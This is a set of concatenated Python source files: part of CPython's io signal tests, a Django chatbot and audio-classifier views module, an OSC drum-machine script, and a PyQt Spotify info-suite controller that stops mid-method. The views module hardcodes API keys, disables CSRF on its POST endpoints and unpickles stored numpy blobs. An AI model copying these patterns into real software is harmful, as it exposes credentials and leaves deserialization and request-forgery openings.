os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = 1024 * 1024
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
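# Illustrative sketch (not part of the test suite above, POSIX-only like the tests it
# mirrors): the non-blocking pipe tests rely on fcntl to switch both pipe ends into
# non-blocking mode and then write until the OS pipe buffer fills up. A minimal
# stand-alone version of that pattern is sketched below; the buffered io classes
# exercised by MiscIOTest additionally report the size of the partial write through
# BlockingIOError.characters_written, which plain os.write() does not.
def _example_nonblocking_pipe_write():
    import os, errno, fcntl
    r, w = os.pipe()
    for fd in (r, w):
        flags = fcntl.fcntl(fd, fcntl.F_GETFL)
        fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
    total = 0
    try:
        while True:
            total += os.write(w, b"x" * 4096)   # fill the pipe buffer
    except OSError as e:                        # EAGAIN once the buffer is full
        assert e.errno == errno.EAGAIN
    os.close(r)
    os.close(w)
    return total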
|
views.py
|
from django.http import Http404, JsonResponse
from django.shortcuts import render
from chatbot.chatbot import create_chatbot
import threading
import pickle
import collections
from io import BytesIO
import numpy as np
import urllib.request
import json
import wave
import librosa
import pandas as pd
from homepage.models import Memory, Person, Raw_Conversation
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from sklearn.naive_bayes import GaussianNB
from chatterbot.trainers import ListTrainer
url ="https://samples.openweathermap.org/data/2.5/weather?q=Eberstadt,%20DE&appid=b6907d289e10d714a6e88b30761fae22"
import sys
np.set_printoptions(threshold=sys.maxsize)
#==== Create chatbot
chatbot = create_chatbot()
#====
def get_mfcc_feature(data):
"""
Converts a wave file into his mfcc features
@args:
data(binary):
@return:
mfcc_features(np.array)
"""
fs=44100
x = librosa.util.fix_length(data, 45000)
mfcc_features = librosa.feature.mfcc(y=x, sr=fs)
return mfcc_features
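# Illustrative sketch (not part of the original views): a minimal, self-contained
# example of the MFCC pipeline above -- pad/trim a signal to a fixed length,
# compute MFCCs, and flatten them into a feature vector for a classifier. The
# zero-filled array is only a stand-in for real recorded audio.
def _example_mfcc_feature_vector():
    fs = 44100
    x = np.zeros(30000, dtype=np.float32)        # stand-in for decoded audio
    x = librosa.util.fix_length(x, size=45000)   # same target length as above
    mfcc = librosa.feature.mfcc(y=x, sr=fs)      # shape: (n_mfcc, n_frames)
    return mfcc.flatten()                        # 1-D vector, e.g. for GaussianNB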
def get_person(request,name_person):
count = Person.objects.filter(first_name=name_person).count()
if count==0:
p1 = Person(first_name=name_person)
p1.save()
return JsonResponse({"name_person": "unkown"})
else:
return JsonResponse({"name_person": "kown"})
@method_decorator(csrf_exempt, name='post')
def classify_audio(request):
'#0.Step: Get data for classification'
data = request.body
'#1.Step: Check that the byte length is divisible by 2'
if len(data)%2==0:
data_float_raw = librosa.util.buf_to_float(data)
else:
data_float_raw = librosa.util.buf_to_float(data[:-1])
'#2.Step: Trim the beginning and ending silence'
data_float, index = librosa.effects.trim(data_float_raw)
'#3.Step: Get mfcc feature for data'
prediction_mfcc = get_mfcc_feature_data(data_float)
'#4.Step: Flatten mfcc'
prediction_mfcc_fl = prediction_mfcc.flatten()
'#5.Step: Load all data from dbase table Memory'
df = pd.DataFrame(list(Memory.objects.all().values()))
'#6.Step: Create train_label and train_data'
train_data_list = []
for i in range(0, len(df)):
train_data_list.append(
bytes_numpy(df.loc[i, "blob_data_mfcc"]).flatten()
)
train_data = np.array(train_data_list)
train_label = df["ground_truth"].values
'#7.Step: Fit a Gaussian naive Bayes classifier'
clf = GaussianNB()
clf.fit(train_data, train_label)
'#8.Step: Make prediction'
prediction = clf.predict([prediction_mfcc_fl])
print(prediction)
'# Make relative prediction'
relative_predict = clf.predict_log_proba([prediction_mfcc_fl]) / clf.predict_log_proba([prediction_mfcc_fl]).sum()
relative_predict_round_flat = np.around(relative_predict * 100, 4).flatten()
'#Step: Combine the classes with their relative scores'
result_dict = {}
for el_cl, el_pre in zip(clf.classes_, relative_predict_round_flat):
result_dict[el_cl] = el_pre
'#Step: Sort the dict by relative score'
d_sorted = dict(sorted(result_dict.items(), key=lambda kv: kv[1]))
print(d_sorted)
return JsonResponse({"prediction": d_sorted})
def home(request):
return render(request, 'home.html')
@method_decorator(csrf_exempt, name='post')
def recorded_audio(request):
data = request.body
ground_truth = request.headers["Ground-Truth"]
'#1.Step: Check that the byte length is divisible by 2'
if len(data)%2==0:
data_float = librosa.util.buf_to_float(data)
else:
data_float = librosa.util.buf_to_float(data[:-1])
'#2.Step: Serialise the raw float data'
np_bytes = BytesIO()
np.save(np_bytes, data_float, allow_pickle=True)
np_bytes_raw = np_bytes.getvalue()
'#3.Step: Get the mfcc features'
mfcc = get_mfcc_feature_data(data_float)
np_bytes = BytesIO()
np.save(np_bytes, mfcc, allow_pickle=True)
np_bytes_mfcc = np_bytes.getvalue()
m1 = Memory(ground_truth=ground_truth,blob_data_raw=data,
blob_data_float=np_bytes_raw, blob_data_mfcc=np_bytes_mfcc)
m1.save()
return JsonResponse({"successfully":"Successfully saved to db"})
def reco(request):
return render(request, 'reco.html')
def audio(request):
'#1.Step: Get all memories for the table'
all_memories = Memory.objects.all()
all_memories_list = []
for el in all_memories.values('ground_truth').distinct():
key_word = el["ground_truth"]
count = Memory.objects.filter(ground_truth=key_word).count()
all_memories_list.append({"ground_truth":key_word,
"count":count
})
return render(request,'record_audio.html',{"Person":"Gustav","all_memories_list":all_memories_list})
def get_weather(request):
url = 'http://api.openweathermap.org/data/2.5/weather?q=Eberstadt,ger&units=metric&lang=de&APPID=b3b25ed86b9fb6cfaac03f9b37164eef'
req = urllib.request.urlopen(url)
req_con = req.read().decode('utf-8')
req_json = json.loads(req_con)
return JsonResponse(req_json)
def chatbot_answer(request,name_person_global,person_statement):
'#1.Step: Get the chatbot response to the question'
chatbot_response = chatbot.get_response(person_statement)
'#2.Step: Save conversation for training'
task = threading.Thread(target=save_to_db, args=(name_person_global,person_statement,chatbot_response))
'#2.1.Step: Mark the task as a daemon thread so the response can return while the DB write runs in the background'
task.daemon = True
task.start()
return JsonResponse({"chatbot_response":str(chatbot_response)})
def train_chatbot(request,optional_answer_chatbot,person_statement):
trainer = ListTrainer(chatbot)
trainer.train([person_statement,optional_answer_chatbot])
return JsonResponse({"successful_trained": f"person_statement: {person_statement},"+
f"optional_answer_chatbot:{optional_answer_chatbot}"})
# Get example audio file
def get_mfcc_feature_data(data):
"""
Converts a wave file into his mfcc features
@args:
data_path(str):
@return:
mfcc_features(np.array)
"""
fs = 44100
x = librosa.util.fix_length(data, 45000)
mfcc_features = librosa.feature.mfcc(y=x, sr=fs)
return mfcc_features
def save_to_db(name_person_global,person_statement,chatbot_response):
"""
functions save a dataset to the database
@args:
- name_person_global (str): e.g. "gustav"
- person_statement(str): e.g. "Wie heißt du?"
- chatbot_response (str): ich heiße Felix
"""
rc = Raw_Conversation(person_name=name_person_global,person_statement=person_statement,
chatbot_response=chatbot_response)
rc.save()
def bytes_numpy(bytes_raw):
load_bytes = BytesIO(bytes_raw)
loaded_np = np.load(load_bytes, allow_pickle=True)
return loaded_np
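# Illustrative sketch (not part of the original views): round trip of the numpy
# serialisation used for the Memory BLOB columns. np.save() into an in-memory
# BytesIO buffer yields the raw bytes stored in the database, and bytes_numpy()
# above restores the array from them.
def _example_numpy_blob_roundtrip():
    original = np.arange(6, dtype=np.float32).reshape(2, 3)
    buf = BytesIO()
    np.save(buf, original, allow_pickle=True)    # bytes as stored in the DB
    restored = bytes_numpy(buf.getvalue())       # helper defined above
    assert np.array_equal(original, restored)
    return restored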
|
drumMachineWithSequences.py
|
#!/usr/bin/env python
# -o--
"""
drumMachineWithSequences.py
Demo how OSC can manage sound objects defined by RTcmix.
Event loop manages threads for sending MIDI sequences and other data
via OSC paths. One thread to track the others and post state to
stdout.
"""
version :str = "0.1" #RELEASE
USAGE :str = "USAGE: drumMachineWithSequences.py [--help] [--hostname HOSTNAME][--port PORT]"
#-------------------------------------- -o--
from threading import Thread
import time
#
import MOSLog
log = MOSLog.MOSLog(logTime=True, logDate=False)
#import MOSDump as dump
import MOSZ as z
import MOSMusic as music
import MOSOSC
import MOSRTcmix
#-------------------------------------- -o--
# Globals.
bpm :float = 25 #DEFAULT
#
lowThreadEnabled :bool = True
lowSequenceEnabled :bool = False
lowCount :float = -1.0 #NB Initial value out of range.
lowCountPrev :float = lowCount
lowSequenceSubdivision :float = 2.0
lowSequenceOrnamentsEnabled :bool = False
lowOrnament :str = ""
highThreadEnabled :bool = True
highSequenceEnabled :bool = False
highCount :float = -1.0 #NB Initial value out of range.
highCountPrev :float = highCount
highSequenceSubdivision :float = 7.0
boomString :str = ""
kapowString :str = ""
#
postThreadEnabled :bool = True
postEventsEnabled :bool = True
commonSequenceSubdivision :float = lowSequenceSubdivision * highSequenceSubdivision
#-------------------------------------- -o--
# Functions.
# -o-
def lowSequence(**kwargs:dict) -> None:
global lowCount
global lowOrnament
value :int = music.generateScaleSequence(**kwargs)
while True:
if not lowThreadEnabled: break
if not lowSequenceEnabled: continue
lowCount = next(value)
lowOrnament = ""
msg = MOSRTcmix.cmixMessage(client, "/lowSequence", [lowCount])
if lowSequenceOrnamentsEnabled:
ornamentBlob = music.generateOrnament(lowCount, kwargs["key"], kwargs["mode"], bpm)
if ornamentBlob:
ornamentName, ornamentBPM, ornamentSubdivision, ornament = tuple(ornamentBlob)
lowOrnament = ornamentName
msg = MOSRTcmix.cmixMessageAdd(client, msg, ornamentName, [ornamentBPM, ornamentSubdivision, ornament])
client.send(msg)
sleepSubdivisionPerBeat(lowSequenceSubdivision)
# -o-
def highSequence(**kwargs:dict) -> None:
global highCount
value :int = music.generateScaleSequence(**kwargs)
while True:
if not highThreadEnabled: break
if not highSequenceEnabled: continue
highCount = next(value)
client.messageSend("/highSequence", [highCount])
sleepSubdivisionPerBeat(highSequenceSubdivision)
# -o-
def makeBoom() -> None:
global boomString
boomString = "BOOM."
client.messageSend("/boom", [1])
sleepSubdivisionPerBeat(commonSequenceSubdivision)
boomString = ""
# -o-
def makeKapow() -> None:
global kapowString
kapowString = "KAPOW!"
client.messageSend("/kapow", [1])
sleepSubdivisionPerBeat(commonSequenceSubdivision)
kapowString = ""
# -o-
def postOneEvent() -> None:
lowCountString :str = " ."
highCountString :str = " ."
asterisk :str = " "
global lowCountPrev, highCountPrev
global lowOrnament
#
if lowCount != lowCountPrev:
lowCountString = lowCountPrev = lowCount
if len(lowOrnament) > 0:
asterisk = " *"
lowOrnament = " " + lowOrnament
if highCount != highCountPrev:
highCountString = highCountPrev = highCount
s :str = f"| {lowCountString:4}{asterisk} {boomString:5} {kapowString:6}{highCountString:5}{lowOrnament}"
log.message(s)
lowOrnament = ""
# -o-
def postEvents() -> None:
while True:
if not postThreadEnabled: break
if not postEventsEnabled: continue
postOneEvent()
sleepSubdivisionPerBeat(commonSequenceSubdivision)
# -o-
def sleepSubdivisionPerBeat(subDivision:int=1) -> None:
if (bpm <= 0) or (subDivision <= 0):
z.postAndExit(f"{log.defName}: bpm or subDivision are LESS THAN OR EQUAL TO ZERO.")
time.sleep(music.subdivisionPerBeat(bpm, subDivision))
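# -o-
# Illustrative sketch (assumption, not taken from MOSMusic): subdivisionPerBeat()
# presumably turns tempo and subdivision into a sleep interval in seconds, i.e.
# the duration of one beat (60 / bpm) divided by the subdivision count.
# A minimal stand-in under that assumption:
def sketchSubdivisionPerBeat(bpm:float, subDivision:float) -> float:
    return (60.0 / bpm) / subDivision    # e.g. bpm=25, subDivision=2.0 -> 1.2 seconds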
#-------------------------------------- -o--
# Local sequence generators.
# -o-
def generateMonotonicSequence(initialValue:int=0) -> int:
startValue :int = initialValue
while True:
yield startValue
startValue += 1
#-------------------------------------- -o--
# Test things.
# -o-
def testOSC() -> None:
test1 :bool = False
test2 :bool = True
client = MOSOSC.MOSOSC()
client.createClient()
# Send frequencies.
#
if test1:
for r in range(200, 400, 25):
client.messageSend("/lowSequence", [r])
time.sleep(1)
# Send MIDI. Traverse all modes on ivory keys only.
#
if test2:
ivoryKeys :list = music.ModesAdditional[music.ModeNames.major].copy()
root :int = 60
for name in music.Modes.keys():
midiRoot = root + ivoryKeys.pop(0)
log.info(name)
scale :list = music.Modes[name].copy()
scale.append(scale[0] + music.NOTES_PER_OCTAVE)
for note in scale:
client.messageSend("/lowSequence", [midiRoot + note])
time.sleep(0.5)
time.sleep(1)
#
print()
z.postAndExit("")
#ENDDEF -- testOSC()
# -o-
def testCMIXOSCData() -> None:
client = MOSOSC.MOSOSC()
client.createClient(cmdlineArgs.hostname, cmdlineArgs.port)
MOSRTcmix.testSendingRawOSCMessagesToScoreEnabledWithMincOSCData(client)
MOSRTcmix.testSendingCMIXOSCMessagesToScoreEnabledWithMincOSCData(client)
print()
z.postAndExit("")
# -o-
def testScaleSequencer():
# kwargs for generateScaleSequence().
#
d :dict = {
#"key" : music.Key.C, #DEFAULT
#"key" : music.Key.D,
#"key" : music.Key.Gs,
#"octave" : music.MIDINote.C4, #DEFAULT
"octave" : music.MIDINote.C2,
#"scaleForMode" : music.ModeNames.ionian, #DEFAULT
"mode" : music.ModeNames.locrian,
#"octaveRange" : 2, #DEFAULT
"octaveRange" : 3,
#"direction" : music.Direction.UP, #DEFAULT
#"direction" : music.Direction.DOWN,
#"direction" : music.Direction.DOWNUP,
#"direction" : music.Direction.UPDOWN,
#"scaleEndBoundByRoot" : True, #DEFAULT
#"scaleEndBoundByRoot" : False,
}
index = music.generateScaleSequence(**d)
#
while True:
if z.readOneCharacter() == 'q': break
nextNote :int = next(index)
print(f" {nextNote}", end="", flush=True)
#
print("\n\nDONE.", end="\n\r", flush=True)
z.postAndExit("")
#ENDDEF -- testScaleSequencer()
# -o-
def testOrnaments():
rval :list = []
rval = music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 60, music.Key.C, music.ModeNames.ionian)
log.info(f"01: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 69, music.Key.C, music.ModeNames.ionian)
log.info(f"02: {rval}")
#music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 63, music.Key.C, music.ModeNames.ionianX) #FAIL (system).
#music._translateOrnamentScaleToMIDI("sixteenthLeadIn", -1, music.Key.C, music.ModeNames.pentatonic) #FAIL
#music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 110, music.Key.C, music.ModeNames.pentatonic) #FAIL
rval = music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 66, music.Key.C, music.ModeNames.pentatonic)
log.info(f"03: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthTripletTurnaround", 52, music.Key.E, music.ModeNames.phrygian)
log.info(f"04: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthTripletTurnaround", 59, music.Key.E, music.ModeNames.phrygian)
log.info(f"05: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthTripletTurnaround", 67, music.Key.C, music.ModeNames.ionian)
log.info(f"06: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthPop", 60, music.Key.C, music.ModeNames.mixolydian)
log.info(f"07: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthPop", 64, music.Key.C, music.ModeNames.mixolydian)
log.info(f"08: {rval}")
print()
z.postAndExit("")
#-------------------------------------- -o--
# Main.
# -o-
def postHotkeys() -> None:
print( f"""
HOTKEYS--
h Enable/disable high sequence
l Enable/disable low sequence
L Enable/disable low sequence ornaments
b Trigger BOOM
k Trigger KAPOW
C Clear CMIX Disk Memory
- - - - - - - - - - - - - - -
M/m Raise/lower BPM ({bpm})
o Show/hide OSC output
t Hide/show timeline
H Post hotkeys (anytime)
q Quit
""" )
if "__main__" == __name__:
cmdlineArgs = z.parseCommandlineArguments( [
{ "option_strings" : "--hostname",
"default" : "127.0.0.1",
"help" : "Hostname or IP upon which to listen.",
},
{ "option_strings" : "--port",
"default" : 50001,
"type" : int,
"help" : "Port upon which to listen.",
},
] )
#-------------------------------------------- -o-
#testOSC() #DEBUG
#testCMIXOSCData() #DEBUG
#testScaleSequencer() #DEBUG
#testOrnaments() #DEBUG
#-------------------------------------------- -o-
lowSequenceArgs :dict = {
"key" : music.Key.C,
"mode" : music.ModeNames.mixolydian,
#"mode" : music.ModeNames.pentatonic,
"octave" : music.MIDINote.C2,
#"octaveRange" : 2,
#"direction" : music.Direction.UP,
"scaleEndBoundByRoot" : False,
}
highSequenceArgs :dict = {
"key" : music.Key.F,
"mode" : music.ModeNames.mixolydian,
"octave" : music.MIDINote.C5,
"octaveRange" : 3,
"direction" : music.Direction.DOWNUP,
#"scaleEndBoundByRoot" : False,
}
lowThread :Thread = Thread(target=lowSequence, kwargs=lowSequenceArgs)
highThread :Thread = Thread(target=highSequence, kwargs=highSequenceArgs)
postThread :Thread = Thread(target=postEvents)
#
client = MOSOSC.MOSOSC()
client.createClient(cmdlineArgs.hostname, cmdlineArgs.port)
client.enablePathLogging = False
postHotkeys()
z.postCRToContinue()
print("\n")
client.messageSend("/clearDiskMemory")
#
lowThread.start()
highThread.start()
postThread.start()
while True:
ch = z.readOneCharacter()
if 'q' == ch: # Quit
client.messageSend("/quit")
log.info("Quit. Waiting for threads...")
break
elif 'H' == ch: # Post hotkeys.
postHotkeys()
#
elif 'M' == ch: # BPM up/down
bpm += 1
log.info(f"BPM = {bpm}")
elif 'm' == ch:
bpm -= 1
if bpm <= 0:
bpm = 1
log.warning("bpm cannot DROP BELOW 1.")
log.info(f"BPM = {bpm}")
elif 'o' == ch: # OSC reporting on/off
client.enablePathLogging = not client.enablePathLogging
elif 't' == ch: # Timeline off/on
postEventsEnabled = not postEventsEnabled
#
elif 'l' == ch: # lowSequence on/off
lowSequenceEnabled = not lowSequenceEnabled
elif 'L' == ch: # lowSequence ornaments on/off
lowSequenceOrnamentsEnabled = not lowSequenceOrnamentsEnabled
if not lowSequenceOrnamentsEnabled:
music.generateOrnamentReset()
elif 'h' == ch: # highSequence on/off
highSequenceEnabled = not highSequenceEnabled
#
elif 'b' == ch: # BOOM
makeBoom()
elif 'k' == ch: # KAPOW
makeKapow()
#
elif 'C' == ch: # clearDiskMemory
client.messageSend("/clearDiskMemory")
music.generateOrnamentReset()
#
lowThreadEnabled = False
highThreadEnabled = False
postThreadEnabled = False
lowThread.join()
highThread.join()
postThread.join()
#ENDMAIN
|
controller.py
|
"""
Fall 2017 CSc 690
File: controller.py
Author: Steve Pedersen & Andrew Lesondak
System: OS X
Date: 12/13/2017
Usage: python3 spotify_infosuite.py
Dependencies: model, musikki, playback, reviews, view, requests, urllib, unidecode, pyqt5
Description: Controller class. Used to generate window frames and handle events, such as key presses, mouse clicks.
It also handles calculations needed to display elements to the window correctly.
"""
import model
import view
import playback
import musikki
import flickr
from flickr import flickr_thread
from reviews import reviews
import json
import sys
import threading
import requests
import urllib
import ssl
import os
import sys
import shutil
import unidecode
import string
from threading import Thread
from time import sleep
from urllib.request import urlopen
from bs4 import BeautifulSoup
from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton, QAction, QLineEdit
from PyQt5.QtMultimedia import QSoundEffect
from PyQt5.QtCore import *
from PyQt5 import QtNetwork, QtCore
from PyQt5.QtGui import *
from PyQt5 import QtGui
class Controller(QWidget):
"""Handles all logic to build frames and dispatch content to window.
Args:
app (object) -- QApplication
use_default (bool) -- Use default window size or not
"""
def __init__(self, app, use_default=True):
super().__init__()
self.app = app
self.determine_window_size(use_default)
# Build the main view: Multi-Frame Window
self.multi_frame_window = view.MultiFrameWindow(
self.window_x,
self.window_y,
self.window_w,
self.window_h,
"Spotify Info Suite", # window title
"multi_frame_window" # object name
)
self.multi_frame_window.show()
self.init_playback_frame()
self.init_bio_frame()
self.init_news_frame()
self.init_review_frame()
self.init_images_frame()
self.init_lyrics_frame()
self.init_social_frame()
def determine_window_size(self, use_default_size):
"""Window scales to a 1080 screen resolution by default, but will revert to your
own screen resolution if the app window ends up being bigger than your screen
or if use_default_size is set to False
Args:
use_default_size (bool) -- Use default window size or not
"""
screen_resolution = self.app.desktop().screenGeometry()
self.screen_width = screen_resolution.width()
self.screen_height = screen_resolution.height()
# minimum window dimensions
min_w, min_h = 1440, 900
# default window dimensions
def_w, def_h = 1920, 1080
window_fits = False
while not window_fits:
if not use_default_size:
w = self.screen_width
h = self.screen_height
else:
w = def_w
h = def_h
space_w = w / 4
space_h = h / 4
self.window_w = w - space_w
self.window_h = h - space_h
self.window_x = space_w / 4
self.window_y = space_h / 2
if not use_default_size:
window_fits = True
elif self.window_w <= min_w and self.window_h <= min_h:
window_fits = True
else:
def_w = min_w
def_h = min_h
def init_bio_frame(self):
"""
Initialize Bio frame and make the initial async request to Musikki for the Bio.
"""
x = 0
y = self.window_h * 0.1
w = self.window_w / 3
h = self.window_h*3/4 - y
self.bio_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "bio_frame"
)
self.bio_frame.set_display_title("Bio", 10, 5)
self.bio_expando_btn = self.bio_frame.create_expando_button()
self.bio_expando_btn.clicked.connect(self.expand_bio)
self.multi_frame_window.add_frame_bio(self.bio_frame)
self.bio_nam = QtNetwork.QNetworkAccessManager()
self.bio_nam.finished.connect(self.search_bio_handler)
self.musikki_artist = musikki.search(self.current_artist)
if not self.musikki_artist.is_found:
# try again with formatted string
formatted_artist = self.format_unicode_alpha(self.current_artist)
self.musikki_artist = musikki.search(formatted_artist)
if self.musikki_artist.is_found:
self.musikki_artist.get_full_bio(self.bio_nam)
else:
self.bio_frame.set_display_text('No results for current artist.', 10, 45)
def init_news_frame(self):
"""
Initialize News frame and make the initial async request to Musikki.
"""
x = 0
y = self.window_h*3 / 4
w = self.window_w / 3
h = self.window_h / 4
self.news_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "news_frame"
)
self.news_frame.set_display_title("News", 10, 5)
self.multi_frame_window.add_frame(self.news_frame)
self.news_nam = QtNetwork.QNetworkAccessManager()
self.news_nam.finished.connect(self.news_handler)
if self.musikki_artist.is_found:
self.musikki_artist.get_news(self.news_nam)
def init_playback_frame(self):
"""
Initialize Playback Frame, make the connection to Spotify and create playback listener thread.
"""
self.spotify = self.open_spotify()
self.update_current_playing()
self.playback_title_x = 10
self.playback_title_y = 5
x = 0
y = 0
w = self.window_w / 3
h = self.window_h * 0.1
self.playback_frame = model.Frame(self, self.multi_frame_window, x,y, w,h, 'playback_frame')
self.playback_frame.set_display_title(
self.get_current_playing(), self.playback_title_x, self.playback_title_y
)
self.playback_frame.create_playback_buttons()
self.playback_frame.get_playback_prev_button().clicked.connect(self.prev)
self.playback_frame.get_playback_play_button().clicked.connect(self.play_pause)
self.playback_frame.get_playback_next_button().clicked.connect(self.next)
self.multi_frame_window.add_frame(self.playback_frame)
# spawn a playback listener to keep InfoSuite in sync with Spotify
self.listener = Listener(self.current_playing, self.spotify)
self.listener.song_change.connect(self.update_playback_display)
self.listener.run()
def init_lyrics_frame(self):
"""
Initialize Lyrics frame and make the initial async request to Genius.
"""
x = self.window_w / 3
y = 0
w = self.window_w / 3
h = self.window_h * 0.75
self.lyrics_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "lyrics_frame"
)
self.lyrics_frame.set_display_title("Lyrics", 10, 5)
self.lyrics_expando_btn = self.lyrics_frame.create_expando_button()
self.lyrics_expando_btn.clicked.connect(self.expand_lyrics)
self.multi_frame_window.add_frame(self.lyrics_frame)
self.lyrics_nam = QtNetwork.QNetworkAccessManager()
self.lyrics_nam.finished.connect(self.lyrics_handler)
self.get_lyrics()
def init_review_frame(self):
"""
Initialize Review (Pitchfork) frame and make the initial async request to Pitchfork & Metacritic.
"""
x = self.window_w * 2 / 3
y = self.window_h / 2
w = self.window_w / 3
h = self.window_h * 0.37
title_x = 10
title_y = 5
self.review_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, 'review_frame'
)
self.review_frame.set_display_title('Reviews', title_x, title_y)
self.review_expando_btn = self.review_frame.create_expando_button()
self.review_expando_btn.clicked.connect(self.expand_review)
self.multi_frame_window.add_frame(self.review_frame)
self.init_metacritic_frame()
self.get_pitchfork_review()
self.get_metacritic_review()
def init_metacritic_frame(self):
"""
Initialize Metacritic frame.
"""
x = self.window_w * 2/3
y = self.window_h/2 + self.window_h*0.37
w = self.window_w / 3
h = self.window_h * 0.13
self.metacritic_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, 'metacritic_frame'
)
self.multi_frame_window.add_frame(self.metacritic_frame)
def init_images_frame(self):
"""
Initialize Images frame and make the initial async requests to Musikki and Flickr.
"""
x = self.window_w * 2 / 3
y = 0
w = self.window_w / 3
h = self.window_h / 2
title_x = 10
title_y = 5
self.images_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, 'images_frame'
)
self.images_frame.set_display_title('Images', title_x, title_y)
self.multi_frame_window.add_frame(self.images_frame)
self.images_nam = QtNetwork.QNetworkAccessManager()
self.images_nam.finished.connect(self.musikki_images_handler)
self.get_images()
def init_social_frame(self):
"""
Initialize Social frame and make the initial async requests to Musikki.
"""
x = self.window_w / 3
y = self.window_h * 0.75
w = self.window_w / 3
h = self.window_h * 0.25
self.social_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "social_frame"
)
self.social_frame.set_display_title("Social", 10, 5)
self.multi_frame_window.add_frame(self.social_frame)
self.social_nam = QtNetwork.QNetworkAccessManager()
self.social_nam.finished.connect(self.social_handler)
if self.musikki_artist.is_found:
self.musikki_artist.get_social_media_twitter(self.social_nam)
else:
self.social_frame.set_display_text('No results for current artist.', 10, 45)
def get_images(self):
"""Spawn a thread to request images from Flickr.
Thread will signal to update_images_frame() handler with the downloaded images.
"""
if self.musikki_artist.is_found:
self.musikki_artist.get_full_images(self.images_nam)
requester = flickr_thread.Requester()
requester.flickr_reciever.connect(self.update_images_frame)
requester.get_images(self.current_artist)
def get_pitchfork_review(self):
"""Spawn a thread to fetch a review for current album from Pitchfork.com.
Thread will signal to update_review_frame() handler with the downloaded review.
"""
requester = reviews.Requester()
requester.pitchfork_receiver.connect(self.update_review_frame)
artist, album = self.format_unicode_alpha([self.current_artist, self.current_album])
requester.get_pitchfork_review(artist, album)
def get_metacritic_review(self):
"""Spawn a thread to fetch a review for current album from a Metacritic API.
Thread will signal to update_review_frame() handler with the downloaded review.
"""
requester = reviews.Requester()
requester.metacritic_receiver.connect(self.update_review_frame)
requester.get_metacritic_review(self.current_artist, self.current_album)
def update_everything(self):
"""
Fetch new info for all frames.
"""
self.update_current_playing()
self.playback_frame.set_display_title(
